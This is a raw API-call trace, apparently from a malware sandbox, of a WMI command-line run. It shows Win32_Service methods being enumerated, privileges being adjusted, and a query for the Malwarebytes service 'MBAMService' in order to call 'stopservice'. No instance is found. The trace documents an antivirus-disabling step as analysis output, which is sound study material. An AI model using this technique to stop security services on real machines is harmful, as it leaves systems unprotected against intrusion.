This=0x200c4a0, wszName="ReturnValue", lFlags=0, pVal=0x12cf78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfffffffffffffffe, varVal2=0x0), pType=0x12ce58*=1232544, plFlavor=0x0 | out: pVal=0x12cf78*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfffffffffffffffe, varVal2=0x0), pType=0x12ce58*=19, plFlavor=0x0) returned 0x0 [0258.440] malloc (_Size=0x18) returned 0x40cbc0 [0258.440] IWbemQualifierSet:Get (in: This=0x1fd13b0, wszName="read", lFlags=0, pVal=0x12ce60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xff992ac0), plFlavor=0x0 | out: pVal=0x12ce60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xff992ac0), plFlavor=0x0) returned 0x80041002 [0258.441] free (_Block=0x40cbc0) [0258.441] malloc (_Size=0x18) returned 0x40cbc0 [0258.441] IWbemQualifierSet:Get (in: This=0x1fd13b0, wszName="write", lFlags=0, pVal=0x12ce60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xff992ac0), plFlavor=0x0 | out: pVal=0x12ce60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xff992ac0), plFlavor=0x0) returned 0x80041002 [0258.441] free (_Block=0x40cbc0) [0258.442] malloc (_Size=0x18) returned 0x40cbc0 [0258.442] malloc (_Size=0x18) returned 0x40cbe0 [0258.442] IWbemQualifierSet:Get (in: This=0x1fd13b0, wszName="Description", lFlags=0, pVal=0x12cf10*(varType=0x0, wReserved1=0x12, wReserved2=0x0, wReserved3=0x0, varVal1=0xff934293, varVal2=0x12cf18), plFlavor=0x0 | out: pVal=0x12cf10*(varType=0x0, wReserved1=0x12, wReserved2=0x0, wReserved3=0x0, varVal1=0xff934293, varVal2=0x12cf18), plFlavor=0x0) returned 0x80041002 [0258.442] free (_Block=0x40cbe0) [0258.442] malloc (_Size=0x18) returned 0x40cbe0 [0258.442] lstrlenA (lpString="Not Available") returned 13 [0258.442] malloc (_Size=0x1c) returned 0x40d130 [0258.442] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff9222f0, cbMultiByte=-1, lpWideCharStr=0x40d130, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0258.442] free (_Block=0x40d130) [0258.442] IUnknown:Release (This=0x1fd13b0) returned 0x0 [0258.442] malloc (_Size=0x48) returned 0x40d130 [0258.442] malloc (_Size=0x18) returned 0x40cc00 [0258.442] malloc (_Size=0x48) returned 0x40d180 [0258.442] malloc (_Size=0x70) returned 0x40d1d0 [0258.442] malloc (_Size=0x48) returned 0x40d250 [0258.443] free (_Block=0x40d180) [0258.443] free (_Block=0x40d130) [0258.443] free (_Block=0x40d0e0) [0258.443] free (_Block=0x40cbc0) [0258.443] free (_Block=0x40cbe0) [0258.443] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0258.443] IWbemClassObject:GetMethodQualifierSet (in: This=0x200bfa0, wszMethod="StopService", ppQualSet=0x12d578 | out: ppQualSet=0x12d578*=0x1fd13b0) returned 0x0 [0258.443] malloc (_Size=0x18) returned 0x40cbe0 [0258.443] IWbemQualifierSet:Get (in: This=0x1fd13b0, wszName="Implemented", lFlags=0, pVal=0x12d588*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d4163dde42c, varVal2=0xff9344fb), plFlavor=0x0 | out: pVal=0x12d588*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d4163dde42c, varVal2=0xff9344fb), plFlavor=0x0) returned 0x80041002 [0258.443] free (_Block=0x40cbe0) [0258.443] malloc (_Size=0x18) returned 0x40cbe0 [0258.443] malloc (_Size=0x18) returned 0x40cbc0 [0258.444] IWbemQualifierSet:Get (in: This=0x1fd13b0, wszName="Description", lFlags=0, pVal=0x12d5a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff992948, varVal2=0xbbc), plFlavor=0x0 | out: pVal=0x12d5a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error. It returns one of the following integer values:\n0 - The request was accepted.\n1 - The request is not supported.\n2 - The user did not have the necessary access.\n3 - The service cannot be stopped because other services that are running are dependent on it.\n4 - The requested control code is not valid, or it is unacceptable to the service.\n5 - The requested control code cannot be sent to the service because the state of the service (Win32_BaseService:State) is equal to 0, 1, or 2.\n6 - The service has not been started.\n7 - The service did not respond to the start request in a timely fashion.\n8 - Unknown failure when starting the service.\n9 - The directory path to the service executable was not found.\n10 - The service is already running.\n11 - The database to add a new service is locked.\n12 - A dependency for which this service relies on has been removed from the system.\n13 - The service failed to find the service needed from a dependent service.\n14 - The service has been disabled from the system.\n15 - The service does not have the correct authentication to run on the system.\n16 - This service is being removed from the system.\n17 - There is no execution thread for the service.\n18 - There are circular dependencies when starting the service.\n19 - There is a service running under the same name.\n20 - There are invalid characters in the name of the service.\n21 - Invalid parameters have been passed to the service.\n22 - The account, which this service is to run under is either invalid or lacks the permissions to run the service.\n23 - The service exists in the database of services available from the system.\n24 - The service is currently paused in the system.\nOther - For integer values other than those listed above, refer to Win32 error code documentation.", varVal2=0xbbc), plFlavor=0x0) returned 0x0 [0258.444] free (_Block=0x40cbc0) [0258.444] malloc (_Size=0x18) returned 0x40cbc0 [0258.444] IUnknown:Release (This=0x1fd13b0) returned 0x0 [0258.444] malloc (_Size=0x70) returned 0x40d0e0 [0258.444] malloc (_Size=0x70) returned 0x40d2a0 [0258.444] malloc (_Size=0x48) returned 0x40d160 [0258.444] malloc (_Size=0x18) returned 0x40cc20 [0258.444] malloc (_Size=0x70) returned 0x40d320 [0258.444] malloc (_Size=0x70) returned 0x40d3a0 [0258.444] malloc (_Size=0x48) returned 0x40d420 [0258.444] malloc (_Size=0x50) returned 0x40d470 [0258.444] malloc (_Size=0x70) returned 0x40d4d0 [0258.444] malloc (_Size=0x70) returned 0x40d550 [0258.444] malloc (_Size=0x48) returned 0x40d5d0 [0258.444] free (_Block=0x40d420) [0258.444] free (_Block=0x40d3a0) [0258.444] free (_Block=0x40d320) [0258.444] free (_Block=0x40d160) [0258.444] free (_Block=0x40d2a0) [0258.444] free (_Block=0x40d0e0) [0258.444] IUnknown:Release (This=0x200c4a0) returned 0x0 [0258.445] free (_Block=0x40d250) [0258.445] free (_Block=0x40d1d0) [0258.445] free (_Block=0x40d060) [0258.445] IWbemClassObject:NextMethod (in: This=0x200bfa0, lFlags=0, pstrName=0x12d638*=0x0, ppInSignature=0x12d640*=0x0, ppOutSignature=0x12d648*=0x0 | out: pstrName=0x12d638*="PauseService", ppInSignature=0x12d640*=0x0, ppOutSignature=0x12d648*=0x200c4a0) returned 0x0 [0258.445] lstrlenW (lpString="PauseService") returned 12 [0258.445] lstrlenW (lpString="stopservice") returned 11 [0258.445] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="PauseService", cchCount2=12) returned 3 [0258.445] IUnknown:Release (This=0x200c4a0) returned 0x0 [0258.445] IWbemClassObject:NextMethod (in: This=0x200bfa0, lFlags=0, pstrName=0x12d638*=0x0, ppInSignature=0x12d640*=0x0, ppOutSignature=0x12d648*=0x0 | out: pstrName=0x12d638*="ResumeService", ppInSignature=0x12d640*=0x0, ppOutSignature=0x12d648*=0x200c4a0) returned 0x0 [0258.445] lstrlenW (lpString="ResumeService") returned 13 [0258.445] lstrlenW (lpString="stopservice") returned 11 [0258.445] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ResumeService", cchCount2=13) returned 3 [0258.445] IUnknown:Release (This=0x200c4a0) returned 0x0 [0258.445] IWbemClassObject:NextMethod (in: This=0x200bfa0, lFlags=0, pstrName=0x12d638*=0x0, ppInSignature=0x12d640*=0x0, ppOutSignature=0x12d648*=0x0 | out: pstrName=0x12d638*="InterrogateService", ppInSignature=0x12d640*=0x0, ppOutSignature=0x12d648*=0x200c4a0) returned 0x0 [0258.445] lstrlenW (lpString="InterrogateService") returned 18 [0258.445] lstrlenW (lpString="stopservice") returned 11 [0258.445] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="InterrogateService", cchCount2=18) returned 3 [0258.445] IUnknown:Release (This=0x200c4a0) returned 0x0 [0258.445] IWbemClassObject:NextMethod (in: This=0x200bfa0, lFlags=0, pstrName=0x12d638*=0x0, ppInSignature=0x12d640*=0x0, ppOutSignature=0x12d648*=0x0 | out: pstrName=0x12d638*="UserControlService", ppInSignature=0x12d640*=0x200c520, ppOutSignature=0x12d648*=0x200ca20) returned 0x0 [0258.446] lstrlenW (lpString="UserControlService") returned 18 [0258.446] lstrlenW (lpString="stopservice") returned 11 [0258.446] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="UserControlService", cchCount2=18) returned 1 [0258.446] IUnknown:Release (This=0x200c520) returned 0x0 [0258.446] IUnknown:Release (This=0x200ca20) returned 0x0 [0258.446] IWbemClassObject:NextMethod (in: This=0x200bfa0, lFlags=0, pstrName=0x12d638*=0x0, ppInSignature=0x12d640*=0x0, ppOutSignature=0x12d648*=0x0 | out: pstrName=0x12d638*="Create", ppInSignature=0x12d640*=0x200e470, ppOutSignature=0x12d648*=0x200e970) returned 0x0 [0258.446] lstrlenW (lpString="Create") returned 6 [0258.446] lstrlenW (lpString="stopservice") returned 11 [0258.446] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Create", cchCount2=6) returned 3 [0258.447] IUnknown:Release (This=0x200e470) returned 0x0 [0258.447] IUnknown:Release (This=0x200e970) returned 0x0 [0258.447] IWbemClassObject:NextMethod (in: This=0x200bfa0, lFlags=0, pstrName=0x12d638*=0x0, ppInSignature=0x12d640*=0x0, ppOutSignature=0x12d648*=0x0 | out: pstrName=0x12d638*="Change", ppInSignature=0x12d640*=0x200e1f0, ppOutSignature=0x12d648*=0x200e6f0) returned 0x0 [0258.447] lstrlenW (lpString="Change") returned 6 [0258.447] lstrlenW (lpString="stopservice") returned 11 [0258.447] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Change", cchCount2=6) returned 3 [0258.447] IUnknown:Release (This=0x200e1f0) returned 0x0 [0258.447] IUnknown:Release (This=0x200e6f0) returned 0x0 [0258.447] IWbemClassObject:NextMethod (in: This=0x200bfa0, lFlags=0, pstrName=0x12d638*=0x0, ppInSignature=0x12d640*=0x0, ppOutSignature=0x12d648*=0x0 | out: pstrName=0x12d638*="ChangeStartMode", ppInSignature=0x12d640*=0x200c610, ppOutSignature=0x12d648*=0x200cb10) returned 0x0 [0258.447] lstrlenW (lpString="ChangeStartMode") returned 15 [0258.447] lstrlenW (lpString="stopservice") returned 11 [0258.447] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ChangeStartMode", cchCount2=15) returned 3 [0258.447] IUnknown:Release (This=0x200c610) returned 0x0 [0258.447] IUnknown:Release (This=0x200cb10) returned 0x0 [0258.447] IWbemClassObject:NextMethod (in: This=0x200bfa0, lFlags=0, pstrName=0x12d638*=0x0, ppInSignature=0x12d640*=0x0, ppOutSignature=0x12d648*=0x0 | out: pstrName=0x12d638*="Delete", ppInSignature=0x12d640*=0x0, ppOutSignature=0x12d648*=0x200c4a0) returned 0x0 [0258.448] lstrlenW (lpString="Delete") returned 6 [0258.448] lstrlenW (lpString="stopservice") returned 11 [0258.448] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Delete", cchCount2=6) returned 3 [0258.448] IUnknown:Release (This=0x200c4a0) returned 0x0 [0258.448] IWbemClassObject:NextMethod (in: This=0x200bfa0, lFlags=0, pstrName=0x12d638*=0x0, ppInSignature=0x12d640*=0x0, ppOutSignature=0x12d648*=0x0 | out: pstrName=0x12d638*="GetSecurityDescriptor", ppInSignature=0x12d640*=0x0, ppOutSignature=0x12d648*=0x200c640) returned 0x0 [0258.448] lstrlenW (lpString="GetSecurityDescriptor") returned 21 [0258.448] lstrlenW (lpString="stopservice") returned 11 [0258.448] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="GetSecurityDescriptor", cchCount2=21) returned 3 [0258.448] IUnknown:Release (This=0x200c640) returned 0x0 [0258.448] IWbemClassObject:NextMethod (in: This=0x200bfa0, lFlags=0, pstrName=0x12d638*=0x0, ppInSignature=0x12d640*=0x0, ppOutSignature=0x12d648*=0x0 | out: pstrName=0x12d638*="SetSecurityDescriptor", ppInSignature=0x12d640*=0x200c520, ppOutSignature=0x12d648*=0x200ca20) returned 0x0 [0258.448] lstrlenW (lpString="SetSecurityDescriptor") returned 21 [0258.448] lstrlenW (lpString="stopservice") returned 11 [0258.448] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="SetSecurityDescriptor", cchCount2=21) returned 3 [0258.448] IUnknown:Release (This=0x200c520) returned 0x0 [0258.448] IUnknown:Release (This=0x200ca20) returned 0x0 [0258.448] IWbemClassObject:NextMethod (in: This=0x200bfa0, lFlags=0, pstrName=0x12d638*=0x0, ppInSignature=0x12d640*=0x0, ppOutSignature=0x12d648*=0x0 | out: pstrName=0x12d638*=0x0, ppInSignature=0x12d640*=0x0, ppOutSignature=0x12d648*=0x0) returned 0x40005 [0258.448] IUnknown:Release (This=0x200bfa0) returned 0x0 [0258.448] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0258.448] lstrlenW (lpString="SET") returned 3 [0258.448] lstrlenW (lpString="call") returned 4 [0258.448] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0258.449] lstrlenW (lpString="CREATE") returned 6 [0258.449] lstrlenW (lpString="call") returned 4 [0258.449] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0258.449] free (_Block=0x408600) [0258.449] malloc (_Size=0x8) returned 0x40cff0 [0258.449] lstrlenW (lpString="GET") returned 3 [0258.449] lstrlenW (lpString="call") returned 4 [0258.449] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0258.449] lstrlenW (lpString="LIST") returned 4 [0258.451] lstrlenW (lpString="call") returned 4 [0258.451] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0258.451] lstrlenW (lpString="ASSOC") returned 5 [0258.451] lstrlenW (lpString="call") returned 4 [0258.451] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0258.451] WbemLocator:IUnknown:AddRef (This=0x1fd1390) returned 0x3 [0258.451] free (_Block=0x406a90) [0258.451] lstrlenW (lpString="") returned 0 [0258.451] lstrlenW (lpString="XDUWTFONO") returned 9 [0258.451] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0258.451] lstrlenW (lpString="XDUWTFONO") returned 9 [0258.451] malloc (_Size=0x14) returned 0x40cc40 [0258.451] lstrlenW (lpString="XDUWTFONO") returned 9 [0258.451] GetCurrentThreadId () returned 0xbbc [0258.451] GetCurrentProcess () returned 0xffffffffffffffff [0258.451] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x12f980 | out: TokenHandle=0x12f980*=0x298) returned 1 [0258.451] GetTokenInformation (in: TokenHandle=0x298, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12f978 | out: TokenInformation=0x0, ReturnLength=0x12f978) returned 0 [0258.451] malloc (_Size=0x118) returned 0x40d060 [0258.451] GetTokenInformation (in: TokenHandle=0x298, TokenInformationClass=0x3, TokenInformation=0x40d060, TokenInformationLength=0x118, ReturnLength=0x12f978 | out: TokenInformation=0x40d060, ReturnLength=0x12f978) returned 1 [0258.452] AdjustTokenPrivileges (in: TokenHandle=0x298, DisableAllPrivileges=0, NewState=0x40d060*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=1890959615, Attributes=0xd701), (Luid.LowPart=0x0, Luid.HighPart=4222976, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=33554434, Attributes=0xd716), (Luid.LowPart=0x0, Luid.HighPart=4194648, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=151060488, Attributes=0x1000d71c))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0258.452] free (_Block=0x40d060) [0258.452] CloseHandle (hObject=0x298) returned 1 [0258.452] lstrlenW (lpString="GET") returned 3 [0258.452] lstrlenW (lpString="call") returned 4 [0258.452] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0258.452] lstrlenW (lpString="LIST") returned 4 [0258.452] lstrlenW (lpString="call") returned 4 [0258.452] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0258.452] lstrlenW (lpString="SET") returned 3 [0258.452] lstrlenW (lpString="call") returned 4 [0258.452] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0258.452] lstrlenW (lpString="CALL") returned 4 [0258.452] lstrlenW (lpString="call") returned 4 [0258.452] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0258.452] ??0CHString@@QEAA@XZ () returned 0x12f930 [0258.452] GetCurrentThreadId () returned 0xbbc [0258.452] malloc (_Size=0x18) returned 0x40cc60 [0258.452] malloc (_Size=0x18) returned 0x40cc80 [0258.453] malloc (_Size=0x18) returned 0x40cca0 [0258.453] malloc (_Size=0x18) returned 0x40ccc0 [0258.453] malloc (_Size=0x18) returned 0x40cce0 [0258.453] SysStringLen (param_1="\\\\") returned 0x2 [0258.453] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0258.453] malloc (_Size=0x18) returned 0x40cd00 [0258.453] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0258.453] SysStringLen (param_1="\\") returned 0x1 [0258.453] malloc (_Size=0x18) returned 0x40d650 [0258.453] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0258.453] SysStringLen (param_1="root\\cimv2") returned 0xa [0258.453] free (_Block=0x40cd00) [0258.453] free (_Block=0x40cce0) [0258.453] free (_Block=0x40ccc0) [0258.453] free (_Block=0x40cca0) [0258.453] free (_Block=0x40cc80) [0258.454] free (_Block=0x40cc60) [0258.454] malloc (_Size=0x18) returned 0x40cc60 [0258.454] malloc (_Size=0x18) returned 0x40cc80 [0258.454] malloc (_Size=0x18) returned 0x40cca0 [0258.454] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1fd1390, strNetworkResource="\\\\XDUWTFONO\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff9929d0 | out: ppNamespace=0xff9929d0*=0x1fe3b28) returned 0x0 [0258.459] free (_Block=0x40cca0) [0258.459] free (_Block=0x40cc80) [0258.459] free (_Block=0x40cc60) [0258.459] CoSetProxyBlanket (pProxy=0x1fe3b28, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0258.460] free (_Block=0x40d650) [0258.460] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0258.460] ??0CHString@@QEAA@XZ () returned 0x12f6d8 [0258.460] GetCurrentThreadId () returned 0xbbc [0258.460] malloc (_Size=0x70) returned 0x40d060 [0258.461] malloc (_Size=0x50) returned 0x40d0e0 [0258.461] malloc (_Size=0x50) returned 0x40d140 [0258.461] malloc (_Size=0x70) returned 0x40d1a0 [0258.461] malloc (_Size=0x70) returned 0x40d220 [0258.461] malloc (_Size=0x48) returned 0x40d2a0 [0258.461] malloc (_Size=0x18) returned 0x40cc60 [0258.461] lstrlenA (lpString="") returned 0 [0258.461] malloc (_Size=0x2) returned 0x406a90 [0258.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff92314c, cbMultiByte=-1, lpWideCharStr=0x406a90, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0258.461] free (_Block=0x406a90) [0258.461] malloc (_Size=0x70) returned 0x40d2f0 [0258.461] malloc (_Size=0x48) returned 0x40d370 [0258.461] malloc (_Size=0x18) returned 0x40cc80 [0258.461] free (_Block=0x40cc60) [0258.461] IWbemServices:GetObject (in: This=0x1fe3b28, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x12f708*=0x0, ppCallResult=0x0 | out: ppObject=0x12f708*=0x200c030, ppCallResult=0x0) returned 0x0 [0258.480] malloc (_Size=0x18) returned 0x40cc60 [0258.480] IWbemClassObject:GetMethod (in: This=0x200c030, wszName="stopservice", lFlags=0, ppInSignature=0x12f700, ppOutSignature=0x12f718 | out: ppInSignature=0x12f700*=0x0, ppOutSignature=0x12f718*=0x200c530) returned 0x0 [0258.480] free (_Block=0x40cc60) [0258.480] IUnknown:Release (This=0x200c530) returned 0x0 [0258.481] IUnknown:Release (This=0x200c030) returned 0x0 [0258.481] ??0CHString@@QEAA@XZ () returned 0x12f520 [0258.481] GetCurrentThreadId () returned 0xbbc [0258.481] malloc (_Size=0x18) returned 0x40cc60 [0258.481] lstrlenA (lpString="") returned 0 [0258.481] malloc (_Size=0x2) returned 0x406a90 [0258.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff92314c, cbMultiByte=-1, lpWideCharStr=0x406a90, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0258.481] free (_Block=0x406a90) [0258.481] malloc (_Size=0x18) returned 0x40cca0 [0258.481] lstrlenA (lpString="") returned 0 [0258.481] malloc (_Size=0x2) returned 0x406a90 [0258.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff92314c, cbMultiByte=-1, lpWideCharStr=0x406a90, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0258.481] free (_Block=0x406a90) [0258.481] malloc (_Size=0x18) returned 0x40ccc0 [0258.481] free (_Block=0x40cca0) [0258.481] malloc (_Size=0x18) returned 0x40cca0 [0258.481] lstrlenA (lpString="SELECT * FROM ") returned 14 [0258.481] malloc (_Size=0x1e) returned 0x40d3c0 [0258.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff924a40, cbMultiByte=-1, lpWideCharStr=0x40d3c0, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0258.481] free (_Block=0x40d3c0) [0258.481] malloc (_Size=0x18) returned 0x40cce0 [0258.481] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0258.481] SysStringLen (param_1="Win32_Service") returned 0xd [0258.482] free (_Block=0x40cca0) [0258.482] malloc (_Size=0x18) returned 0x40cca0 [0258.482] malloc (_Size=0x18) returned 0x40cd00 [0258.482] lstrlenA (lpString=" WHERE ") returned 7 [0258.482] malloc (_Size=0x10) returned 0x40d650 [0258.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff923e20, cbMultiByte=-1, lpWideCharStr=0x40d650, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0258.482] free (_Block=0x40d650) [0258.482] malloc (_Size=0x18) returned 0x40d650 [0258.482] SysStringLen (param_1=" WHERE ") returned 0x7 [0258.482] SysStringLen (param_1="name like '%%MBAMService%%'") returned 0x1b [0258.482] malloc (_Size=0x18) returned 0x40d670 [0258.482] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0258.482] SysStringLen (param_1=" WHERE name like '%%MBAMService%%'") returned 0x22 [0258.482] free (_Block=0x40cce0) [0258.482] free (_Block=0x40d650) [0258.482] free (_Block=0x40cd00) [0258.482] free (_Block=0x40cca0) [0258.482] malloc (_Size=0x18) returned 0x40cca0 [0258.483] IWbemServices:ExecQuery (in: This=0x1fe3b28, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE name like '%%MBAMService%%'", lFlags=48, pCtx=0x0, ppEnum=0x12f508 | out: ppEnum=0x12f508*=0x1fe3c28) returned 0x0 [0258.487] free (_Block=0x40cca0) [0258.487] CoSetProxyBlanket (pProxy=0x1fe3c28, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0258.490] IEnumWbemClassObject:Next (in: This=0x1fe3c28, lTimeout=-1, uCount=0x1, apObjects=0x12f510, puReturned=0x12f698 | out: apObjects=0x12f510*=0x0, puReturned=0x12f698*=0x0) returned 0x1 [0259.150] IUnknown:Release (This=0x1fe3c28) returned 0x0 [0259.152] free (_Block=0x40d670) [0259.152] free (_Block=0x40ccc0) [0259.152] free (_Block=0x40cc60) [0259.152] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0259.152] free (_Block=0x40cc80) [0259.153] free (_Block=0x40d2a0) [0259.153] free (_Block=0x40d220) [0259.153] free (_Block=0x40d1a0) [0259.153] free (_Block=0x40d140) [0259.153] free (_Block=0x40d0e0) [0259.153] free (_Block=0x40d370) [0259.153] free (_Block=0x40d2f0) [0259.153] free (_Block=0x40d060) [0259.153] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0259.153] GetCurrentThreadId () returned 0xbbc [0259.153] ??0CHString@@QEAA@PEBG@Z () returned 0x12fa28 [0259.153] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x12fa28 [0259.153] malloc (_Size=0x800) returned 0x40de20 [0259.153] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x40de20, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0259.153] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0259.153] malloc (_Size=0x1c) returned 0x40d060 [0259.154] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x40d060, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0259.154] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 27 [0259.154] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0259.154] free (_Block=0x40d060) [0259.154] free (_Block=0x40de20) [0259.154] ??1CHString@@QEAA@XZ () returned 0x5fb5c001 [0259.154] WbemLocator:IUnknown:Release (This=0x1fe3b28) returned 0x0 [0259.155] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0259.155] _kbhit () returned 0x0 [0259.156] free (_Block=0x40cff0) [0259.156] free (_Block=0x40cac0) [0259.157] free (_Block=0x40caa0) [0259.157] free (_Block=0x40ca80) [0259.157] free (_Block=0x40ca60) [0259.157] free (_Block=0x40ce20) [0259.157] free (_Block=0x40cfc0) [0259.157] free (_Block=0x40cf60) [0259.157] 